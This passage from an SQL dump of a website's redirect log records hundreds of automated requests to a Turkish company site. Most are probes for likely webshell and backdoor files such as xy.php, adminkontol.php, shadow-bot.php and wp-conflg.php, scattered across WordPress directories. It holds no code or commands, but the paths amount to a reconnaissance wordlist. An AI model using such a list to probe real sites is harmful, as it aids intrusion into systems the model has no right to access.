00:00:00',301),(64384,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-signup.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/wp-signup.php','',1,0,'2026-05-09 02:06:18','0000-00-00 00:00:00',301),(64385,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/wp-config-backup.php','',2,0,'2026-05-09 02:06:18','0000-00-00 00:00:00',301),(64386,'http://3s-technologies.com.tr/tr/wp-content/themes/master-blog/content-none-new-compiler.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/master-blog/content-none-new-compiler.php','',2,0,'2026-05-09 02:06:19','0000-00-00 00:00:00',301),(64387,'http://3s-technologies.com.tr/tr/wp-content/themes/villagio-child/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/villagio-child/admin.php','',1,0,'2026-05-09 02:06:20','0000-00-00 00:00:00',301),(64388,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/sass/site/primary',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentynineteen/sass/site/primary/','',1,0,'2026-05-09 02:06:21','0000-00-00 00:00:00',301),(64389,'http://3s-technologies.com.tr/tr/wp-content/wp-content/themes/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/themes/admin.php','',1,0,'2026-05-09 02:06:22','0000-00-00 00:00:00',301),(64390,'http://3s-technologies.com.tr/tr/wp-content/themes/consultstreet/config.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/consultstreet/config.php','',1,0,'2026-05-09 02:06:23','0000-00-00 00:00:00',301),(64391,'http://3s-technologies.com.tr/tr/wp-content/themes/blogger-buzz/welcome/js',NULL,'http://3s-technologies.com.tr/wp-content/themes/blogger-buzz/welcome/js/','',1,0,'2026-05-09 02:06:24','0000-00-00 00:00:00',301),(64392,'http://3s-technologies.com.tr/tr/wp-content/themes/mesmerize/page-templates',NULL,'http://3s-technologies.com.tr/wp-content/themes/mesmerize/page-templates/','',1,0,'2026-05-09 02:06:25','0000-00-00 00:00:00',301),(64393,'http://3s-technologies.com.tr/tr/wp-content/themes/hello-elementor/template-parts',NULL,'http://3s-technologies.com.tr/wp-content/themes/hello-elementor/template-parts/','',1,0,'2026-05-09 02:06:27','0000-00-00 00:00:00',301),(64394,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/includes/builder/post/taxonomy',NULL,'http://3s-technologies.com.tr/wp-content/themes/Divi/includes/builder/post/taxonomy/','',1,0,'2026-05-09 02:06:27','0000-00-00 00:00:00',301),(64395,'http://3s-technologies.com.tr/tr/wp-content/themes/system.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/system.php','',1,0,'2026-05-09 02:06:28','0000-00-00 00:00:00',301),(64396,'http://3s-technologies.com.tr/tr/wp-content/themes/module.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/module.php','',1,0,'2026-05-09 02:06:29','0000-00-00 00:00:00',301),(64397,'http://3s-technologies.com.tr/tr/wp-content/themes/test.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/test.php','',1,0,'2026-05-09 02:06:30','0000-00-00 00:00:00',301),(64398,'http://3s-technologies.com.tr/tr/wp-content/themes/blog-kit/inc/demo/demo-content',NULL,'http://3s-technologies.com.tr/wp-content/themes/blog-kit/inc/demo/demo-content/','',1,0,'2026-05-09 02:06:31','0000-00-00 00:00:00',301),(64399,'http://3s-technologies.com.tr/tr/wp-content/themes/flatsome/inc',NULL,'http://3s-technologies.com.tr/wp-content/themes/flatsome/inc/','',1,0,'2026-05-09 02:06:32','0000-00-00 00:00:00',301),(64400,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/config.php','',1,0,'2026-05-09 02:06:33','0000-00-00 00:00:00',301),(64401,'http://3s-technologies.com.tr/tr/wp-includes/pomo/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/pomo/config.php','',1,0,'2026-05-09 02:06:34','0000-00-00 00:00:00',301),(64402,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/sitemaps/providers/config.php','',1,0,'2026-05-09 02:06:35','0000-00-00 00:00:00',301),(64403,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/sitemaps/config.php','',1,0,'2026-05-09 02:06:36','0000-00-00 00:00:00',301),(64404,'http://3s-technologies.com.tr/tr/wp-includes/bootstrap.php',NULL,'http://3s-technologies.com.tr/wp-includes/bootstrap.php','',1,0,'2026-05-09 02:06:37','0000-00-00 00:00:00',301),(64405,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/panel.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/panel.php','',1,0,'2026-05-09 02:06:37','0000-00-00 00:00:00',301),(64406,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/shadow-bot.php',NULL,'http://3s-technologies.com.tr/wp-includes/php-compat/shadow-bot.php','',1,0,'2026-05-09 02:06:41','0000-00-00 00:00:00',301),(64407,'http://3s-technologies.com.tr/tr/wp-includes/text/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/config.php','',1,0,'2026-05-09 02:06:42','0000-00-00 00:00:00',301),(64408,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/src/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/src/config.php','',1,0,'2026-05-09 02:06:43','0000-00-00 00:00:00',301),(64409,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/config.php','',1,0,'2026-05-09 02:06:44','0000-00-00 00:00:00',301),(64410,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/style-engine/config.php','',1,0,'2026-05-09 02:06:45','0000-00-00 00:00:00',301),(64411,'http://3s-technologies.com.tr/tr/wp-includes/assets/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/config.php','',1,0,'2026-05-09 02:06:46','0000-00-00 00:00:00',301),(64412,'http://3s-technologies.com.tr/tr/wp-includes/interactivity-api/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/interactivity-api/config.php','',1,0,'2026-05-09 02:06:47','0000-00-00 00:00:00',301),(64413,'http://3s-technologies.com.tr/tr/wp-includes/widgets/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/config.php','',2,0,'2026-05-09 02:06:48','0000-00-00 00:00:00',301),(64414,'http://3s-technologies.com.tr/tr/wp-content/languages/config.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/config.php','',2,0,'2026-05-09 02:06:49','0000-00-00 00:00:00',301),(64415,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/config.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/config.php','',1,0,'2026-05-09 02:06:50','0000-00-00 00:00:00',301),(64416,'http://3s-technologies.com.tr/tr/wp-content/cache/config.php',NULL,'http://3s-technologies.com.tr/wp-content/cache/config.php','',1,0,'2026-05-09 02:06:52','0000-00-00 00:00:00',301),(64417,'http://3s-technologies.com.tr/tr/wp-content/wp-cloudflare-super-page-cache/config.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-cloudflare-super-page-cache/config.php','',1,0,'2026-05-09 02:06:53','0000-00-00 00:00:00',301),(64418,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/library',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/library/','',1,0,'2026-05-09 02:06:54','0000-00-00 00:00:00',301),(64419,'http://3s-technologies.com.tr/tr/wp-includes/abilities-api',NULL,'http://3s-technologies.com.tr/wp-includes/abilities-api/','',1,0,'2026-05-09 02:06:55','0000-00-00 00:00:00',301),(64420,'http://3s-technologies.com.tr/tr/wp-content/languages/loco',NULL,'http://3s-technologies.com.tr/wp-content/languages/loco/','',1,0,'2026-05-09 02:06:56','0000-00-00 00:00:00',301),(64421,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-theme-installer-skin-client.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/class-theme-installer-skin-client.php','',1,0,'2026-05-09 02:06:58','0000-00-00 00:00:00',301),(64422,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-recovery-mode-link-service-edit.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-recovery-mode-link-service-edit.php','',1,0,'2026-05-09 02:06:59','0000-00-00 00:00:00',301),(64423,'http://3s-technologies.com.tr/tr/wp-admin/user-new-reference.php',NULL,'http://3s-technologies.com.tr/wp-admin/user-new-reference.php','',1,0,'2026-05-09 02:06:59','0000-00-00 00:00:00',301),(64424,'http://3s-technologies.com.tr/tr/vendor/stripe/stripe-php/lib/financialconnections',NULL,'http://3s-technologies.com.tr/vendor/stripe/stripe-php/lib/FinancialConnections/','',1,0,'2026-05-09 02:07:00','0000-00-00 00:00:00',301),(64425,'http://3s-technologies.com.tr/tr/vendor/stripe/stripe-php/lib/service/financialconnections',NULL,'http://3s-technologies.com.tr/vendor/stripe/stripe-php/lib/Service/FinancialConnections/','',1,0,'2026-05-09 02:07:01','0000-00-00 00:00:00',301),(64426,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-excerpt-meta.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-excerpt-meta.php','',1,0,'2026-05-09 02:07:02','0000-00-00 00:00:00',301),(64427,'http://3s-technologies.com.tr/tr/wp-includes/id3/module.audio-video.riff-http.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/module.audio-video.riff-http.php','',1,0,'2026-05-09 02:07:03','0000-00-00 00:00:00',301),(64428,'http://3s-technologies.com.tr/tr/wp-includes/js/thickbox/logs1.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/thickbox/logs1.php','',1,0,'2026-05-09 02:07:07','0000-00-00 00:00:00',301),(64429,'http://3s-technologies.com.tr/tr/wp-admin/xy.php',NULL,'http://3s-technologies.com.tr/wp-admin/xy.php','',2,0,'2026-05-09 02:07:08','0000-00-00 00:00:00',301),(64430,'http://3s-technologies.com.tr/tr/wp-includes/xy.php',NULL,'http://3s-technologies.com.tr/wp-includes/xy.php','',2,0,'2026-05-09 02:07:09','0000-00-00 00:00:00',301),(64431,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/footer-class.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/footer-class.php','',2,0,'2026-05-09 02:07:10','0000-00-00 00:00:00',301),(64432,'http://3s-technologies.com.tr/tr/wp-content/good.php',NULL,'http://3s-technologies.com.tr/wp-content/good.php','',1,0,'2026-05-09 02:07:11','0000-00-00 00:00:00',301),(64433,'http://3s-technologies.com.tr/tr/wp-admin/editor',NULL,'http://3s-technologies.com.tr/wp-admin/editor/','',1,0,'2026-05-09 02:07:12','0000-00-00 00:00:00',301),(64434,'http://3s-technologies.com.tr/tr/wp-admin/profile/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/profile/admin.php','',1,0,'2026-05-09 02:07:13','0000-00-00 00:00:00',301),(64435,'http://3s-technologies.com.tr/tr/summia',NULL,'http://3s-technologies.com.tr/summia/','',1,0,'2026-05-09 02:07:14','0000-00-00 00:00:00',301),(64436,'http://3s-technologies.com.tr/tr/wp-content/wp-content/languages/config.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/languages/config.php','',1,0,'2026-05-09 02:07:15','0000-00-00 00:00:00',301),(64437,'http://3s-technologies.com.tr/tr/wp-content/wp-content/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-content/admin.php','',1,0,'2026-05-09 02:07:16','0000-00-00 00:00:00',301),(64438,'http://3s-technologies.com.tr/tr/wp-content/h2.php',NULL,'http://3s-technologies.com.tr/wp-content/h2.php','',1,0,'2026-05-09 02:07:17','0000-00-00 00:00:00',301),(64439,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/chosen.php',NULL,'http://3s-technologies.com.tr/wp-content/mu-plugins/chosen.php','',1,0,'2026-05-09 02:07:18','0000-00-00 00:00:00',301),(64440,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/autoload_classmap.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade-temp-backup/autoload_classmap.php','',1,0,'2026-05-09 02:07:19','0000-00-00 00:00:00',301),(64441,'http://3s-technologies.com.tr/tr/wp-admin/images/base.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/Base.php','',2,0,'2026-05-09 02:07:20','0000-00-00 00:00:00',301),(64442,'http://3s-technologies.com.tr/tr/wp-content/plugins.bk/contact-form-7/includes/js/jquery-ui/themes/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins.bk/contact-form-7/includes/js/jquery-ui/themes/admin.php','',1,0,'2026-05-09 02:07:21','0000-00-00 00:00:00',301),(64443,'http://3s-technologies.com.tr/tr/wp-content/plugins.bk/js_composer/include/classes/vendors/plugins/system.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins.bk/js_composer/include/classes/vendors/plugins/system.php','',1,0,'2026-05-09 02:07:22','0000-00-00 00:00:00',301),(64444,'http://3s-technologies.com.tr/tr/wp-content/plugins.bk/wordpress-seo/admin/import/plugins/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins.bk/wordpress-seo/admin/import/plugins/maintenance.php','',1,0,'2026-05-09 02:07:23','0000-00-00 00:00:00',301),(64445,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wp-mail.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/wp-mail.php','',1,0,'2026-05-09 02:07:24','0000-00-00 00:00:00',301),(64446,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/wp-conflg.php','',2,0,'2026-05-09 02:07:25','0000-00-00 00:00:00',301),(64447,'http://3s-technologies.com.tr/tr/wp-admin/user/lock.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/lock.php','',1,0,'2026-05-09 02:07:27','0000-00-00 00:00:00',301),(64448,'http://3s-technologies.com.tr/tr/wp-content/network/uploads/system.php',NULL,'http://3s-technologies.com.tr/wp-content/network/uploads/system.php','',1,0,'2026-05-09 02:07:29','0000-00-00 00:00:00',301),(64449,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/colors',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/colors/','',1,0,'2026-05-09 02:07:30','0000-00-00 00:00:00',301),(64450,'http://3s-technologies.com.tr/tr/wp-content/backups-dup-pro/imports/network',NULL,'http://3s-technologies.com.tr/wp-content/backups-dup-pro/imports/network/','',1,0,'2026-05-09 02:07:31','0000-00-00 00:00:00',301),(64451,'http://3s-technologies.com.tr/tr/wp-content/ai1wm-backups/includes',NULL,'http://3s-technologies.com.tr/wp-content/ai1wm-backups/includes/','',1,0,'2026-05-09 02:07:32','0000-00-00 00:00:00',301),(64452,'http://3s-technologies.com.tr/tr/wp-admin/panel.php',NULL,'http://3s-technologies.com.tr/wp-admin/panel.php','',1,0,'2026-05-09 02:07:35','0000-00-00 00:00:00',301),(64453,'http://3s-technologies.com.tr/tr/wp-includes/id3/wp-themes.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/wp-themes.php','',1,0,'2026-05-09 02:07:36','0000-00-00 00:00:00',301),(64454,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/maint',NULL,'http://3s-technologies.com.tr/wp-admin/js/widgets/maint/','',1,0,'2026-05-09 02:07:37','0000-00-00 00:00:00',301),(64455,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/exception/transport',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/src/Exception/Transport/','',1,0,'2026-05-09 02:07:38','0000-00-00 00:00:00',301),(64456,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/response',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/src/Response/','',1,0,'2026-05-09 02:07:39','0000-00-00 00:00:00',301),(64457,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/wp-sing.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-supports/wp-sing.php','',1,0,'2026-05-09 02:07:39','0000-00-00 00:00:00',301),(64458,'http://3s-technologies.com.tr/tr/wp-includes/blocks/media-text',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/media-text/','',1,0,'2026-05-09 02:07:41','0000-00-00 00:00:00',301),(64459,'http://3s-technologies.com.tr/tr/wp-includes/blocks/missing',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/missing/','',1,0,'2026-05-09 02:07:42','0000-00-00 00:00:00',301),(64460,'http://3s-technologies.com.tr/tr/wp-includes/id3/img/content/media/lnl',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/img/content/media/lnl/','',1,0,'2026-05-09 02:07:44','0000-00-00 00:00:00',301),(64461,'http://3s-technologies.com.tr/tr/wp-includes/blocks/gallery',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/gallery/','',1,0,'2026-05-09 02:07:45','0000-00-00 00:00:00',301),(64462,'http://3s-technologies.com.tr/tr/wp-includes/l10n/includes/content/v2/uploads/docs/yat/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/l10n/includes/content/v2/uploads/docs/yat/admin.php','',1,0,'2026-05-09 02:07:46','0000-00-00 00:00:00',301),(64463,'http://3s-technologies.com.tr/tr/cache/adminkontol.php',NULL,'http://3s-technologies.com.tr/cache/adminkontol.php','',1,0,'2026-05-09 02:07:47','0000-00-00 00:00:00',301),(64464,'http://3s-technologies.com.tr/tr/wp-includes/text/vx.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/vx.php','',1,0,'2026-05-09 02:07:48','0000-00-00 00:00:00',301),(64465,'http://3s-technologies.com.tr/tr/wp-admin/uploads/system.php',NULL,'http://3s-technologies.com.tr/wp-admin/uploads/system.php','',1,0,'2026-05-09 02:07:50','0000-00-00 00:00:00',301),(64466,'http://3s-technologies.com.tr/tr/wp-admin/block/img/themes',NULL,'http://3s-technologies.com.tr/wp-admin/block/img/themes/','',1,0,'2026-05-09 02:07:50','0000-00-00 00:00:00',301),(64467,'http://3s-technologies.com.tr/tr/wp-includes/blocks/preformatted',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/preformatted/','',1,0,'2026-05-09 02:07:51','0000-00-00 00:00:00',301),(64468,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/wp-load.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/themes/wp-load.php','',1,0,'2026-05-09 02:07:52','0000-00-00 00:00:00',301),(64469,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/home.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/home.php','',1,0,'2026-05-09 02:07:53','0000-00-00 00:00:00',301),(64470,'http://3s-technologies.com.tr/tr/wp-includes/text/system_core.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/system_core.php','',1,0,'2026-05-09 02:07:55','0000-00-00 00:00:00',301),(64471,'http://3s-technologies.com.tr/tr/wp-includes/maintenance.php',NULL,'http://3s-technologies.com.tr/wp-includes/maintenance.php','',1,0,'2026-05-09 02:07:56','0000-00-00 00:00:00',301),(64472,'http://3s-technologies.com.tr/tr/wp-includes/w.php',NULL,'http://3s-technologies.com.tr/wp-includes/w.php','',1,0,'2026-05-09 02:07:58','0000-00-00 00:00:00',301),(64473,'http://3s-technologies.com.tr/tr/class-wp-http-client.php',NULL,'http://3s-technologies.com.tr/class-wp-http-client.php','',1,0,'2026-05-09 02:08:00','0000-00-00 00:00:00',301),(64474,'http://3s-technologies.com.tr/tr/wp-includes/blocks/tag-cloud',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/tag-cloud/','',2,0,'2026-05-09 02:08:01','0000-00-00 00:00:00',301),(64475,'http://3s-technologies.com.tr/tr/nic.php',NULL,'http://3s-technologies.com.tr/nic.php','',2,0,'2026-05-09 02:08:02','0000-00-00 00:00:00',301),(64476,'http://3s-technologies.com.tr/tr/wp-includes/fonts/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-includes/fonts/wp-conflg.php','',1,0,'2026-05-09 02:08:03','0000-00-00 00:00:00',301),(64477,'http://3s-technologies.com.tr/tr/wp-includes/images/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/wp-conflg.php','',2,0,'2026-05-09 02:08:04','0000-00-00 00:00:00',301),(64478,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes/api.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/themes/api.php','',1,0,'2026-05-09 02:08:07','0000-00-00 00:00:00',301),(64479,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/core.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/core.php','',1,0,'2026-05-09 02:08:08','0000-00-00 00:00:00',301),(64480,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/components/wp-cron-activation.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/components/wp-cron-activation.php','',1,0,'2026-05-09 02:08:09','0000-00-00 00:00:00',301),(64481,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-library/includes',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/block-library/includes/','',1,0,'2026-05-09 02:08:10','0000-00-00 00:00:00',301),(64482,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/base-styles/user',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/base-styles/user/','',1,0,'2026-05-09 02:08:11','0000-00-00 00:00:00',301),(64483,'http://3s-technologies.com.tr/tr/wp-includes/abilities-api/parse',NULL,'http://3s-technologies.com.tr/wp-includes/abilities-api/Parse/','',1,0,'2026-05-09 02:08:12','0000-00-00 00:00:00',301),(64484,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/html-api',NULL,'http://3s-technologies.com.tr/wp-includes/sitemaps/providers/html-api/','',1,0,'2026-05-09 02:08:13','0000-00-00 00:00:00',301),(64485,'http://3s-technologies.com.tr/tr/comments/feed',NULL,'http://3s-technologies.com.tr/comments/feed/','',1,0,'2026-05-09 13:10:50','0000-00-00 00:00:00',301),(64486,'http://3s-technologies.com.tr/tr/wp-content/updraft/plugins-old/updraftplus/vendor/team-updraft',NULL,'http://3s-technologies.com.tr/wp-content/updraft/plugins-old/updraftplus/vendor/team-updraft/','',1,0,'2026-05-09 13:10:53','0000-00-00 00:00:00',301),(64487,'http://3s-technologies.com.tr/tr/wp-content/test.php',NULL,'http://3s-technologies.com.tr/wp-content/test.php','',1,0,'2026-05-09 13:11:11','0000-00-00 00:00:00',301),(64488,'http://3s-technologies.com.tr/tr/wp-admin/includes/images',NULL,'http://3s-technologies.com.tr/wp-admin/includes/images/','',1,0,'2026-05-09 13:11:28','0000-00-00 00:00:00',301),(64489,'http://3s-technologies.com.tr/tr/upload/zczv.php',NULL,'http://3s-technologies.com.tr/upload/zczv.php','',1,0,'2026-05-09 13:11:49','0000-00-00 00:00:00',301),(64490,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/template-parts',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyone/template-parts/','',1,0,'2026-05-09 13:12:16','0000-00-00 00:00:00',301),(64491,'http://3s-technologies.com.tr/tr/wp-includes/blocks/column',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/column/','',1,0,'2026-05-09 13:12:28','0000-00-00 00:00:00',301),(64492,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/assets/fonts/inter',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwenty/assets/fonts/inter/','',1,0,'2026-05-09 13:12:40','0000-00-00 00:00:00',301),(64493,'http://3s-technologies.com.tr/tr/wp-includes/blocks/nextpage',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/nextpage/','',1,0,'2026-05-09 13:12:47','0000-00-00 00:00:00',301),(64494,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-template',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-template/','',1,0,'2026-05-09 13:12:53','0000-00-00 00:00:00',301),(64495,'http://3s-technologies.com.tr/tr/wp-content/uploads/elementor',NULL,'http://3s-technologies.com.tr/wp-content/uploads/elementor/','',1,0,'2026-05-09 13:12:54','0000-00-00 00:00:00',301),(64496,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpforms',NULL,'http://3s-technologies.com.tr/wp-content/uploads/wpforms/','',1,0,'2026-05-09 13:13:01','0000-00-00 00:00:00',301),(64497,'http://3s-technologies.com.tr/tr/wp-includes/blocks/home-link',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/home-link/','',1,0,'2026-05-09 13:13:06','0000-00-00 00:00:00',301),(64498,'http://3s-technologies.com.tr/tr/wp-includes/blocks/search',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/search/','',1,0,'2026-05-09 13:13:16','0000-00-00 00:00:00',301),(64499,'http://3s-technologies.com.tr/tr/reception1/includes/tcpdf/examples/config',NULL,'http://3s-technologies.com.tr/reception1/includes/tcpdf/examples/config/','',1,0,'2026-05-09 13:13:18','0000-00-00 00:00:00',301),(64500,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-reply-link',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-reply-link/','',1,0,'2026-05-09 13:13:27','0000-00-00 00:00:00',301),(64501,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/search/images',NULL,'http://3s-technologies.com.tr/wp-includes/rest-api/search/images/','',1,0,'2026-05-09 13:13:34','0000-00-00 00:00:00',301),(64502,'http://3s-technologies.com.tr/tr/wp-content/plugins/template-singl-portfolio.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/template-singl-portfolio.php','',1,0,'2026-05-09 13:13:35','0000-00-00 00:00:00',301),(64503,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/codemirror/config.php','',1,0,'2026-05-09 13:13:37','0000-00-00 00:00:00',301),(64504,'http://3s-technologies.com.tr/tr/wp-admin/maint/providers',NULL,'http://3s-technologies.com.tr/wp-admin/maint/providers/','',1,0,'2026-05-09 13:13:43','0000-00-00 00:00:00',301),(64505,'http://3s-technologies.com.tr/tr/wp-includes/wp-cron.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-cron.php','',1,0,'2026-05-09 13:13:44','0000-00-00 00:00:00',301),(64506,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/network',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/network/','',1,0,'2026-05-09 13:13:48','0000-00-00 00:00:00',301),(64507,'http://3s-technologies.com.tr/tr/session_init.php',NULL,'http://3s-technologies.com.tr/session_init.php','',1,0,'2026-05-09 13:13:49','0000-00-00 00:00:00',301),(64508,'http://3s-technologies.com.tr/tr/wp-includes/assets/joker.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/joker.php','',1,0,'2026-05-09 13:13:51','0000-00-00 00:00:00',301),(64509,'http://3s-technologies.com.tr/tr/wp-includes/blocks/page-list',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/page-list/','',1,0,'2026-05-09 13:13:52','0000-00-00 00:00:00',301),(64510,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/system_core.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-bindings/system_core.php','',1,0,'2026-05-09 13:13:58','0000-00-00 00:00:00',301),(64511,'http://3s-technologies.com.tr/tr/wp-includes/customize/fonts',NULL,'http://3s-technologies.com.tr/wp-includes/customize/fonts/','',1,0,'2026-05-09 13:14:01','0000-00-00 00:00:00',301),(64512,'http://3s-technologies.com.tr/tr/wp-content/plugins/iitespeed-cache/classwithtostring.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/Iitespeed-cache/classwithtostring.php','',1,0,'2026-05-09 13:14:04','0000-00-00 00:00:00',301),(64513,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced/customize',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/namespaced/customize/','',1,0,'2026-05-09 13:14:07','0000-00-00 00:00:00',301),(64514,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/parts',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentytwo/parts/','',1,0,'2026-05-09 13:14:08','0000-00-00 00:00:00',301),(64515,'http://3s-technologies.com.tr/tr/wp-includes/blocks/query-title',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/query-title/','',1,0,'2026-05-09 13:14:09','0000-00-00 00:00:00',301),(64516,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/revslider.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/revslider/temp/update_extract/revslider.php','',1,0,'2026-05-09 13:14:10','0000-00-00 00:00:00',301),(64517,'http://3s-technologies.com.tr/tr/wp-content/plugins/pretty-link/js/build/wp-cron.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pretty-link/js/build/wp-cron.php','',1,0,'2026-05-09 13:14:11','0000-00-00 00:00:00',301),(64518,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/builder/type/base/dynamic-css/button',NULL,'http://3s-technologies.com.tr/wp-content/themes/astra/inc/builder/type/base/dynamic-css/button/','',1,0,'2026-05-09 13:14:12','0000-00-00 00:00:00',301),(64519,'http://3s-technologies.com.tr/tr/wp-includes/author-template-object.php',NULL,'http://3s-technologies.com.tr/wp-includes/author-template-object.php','',1,0,'2026-05-09 13:14:15','0000-00-00 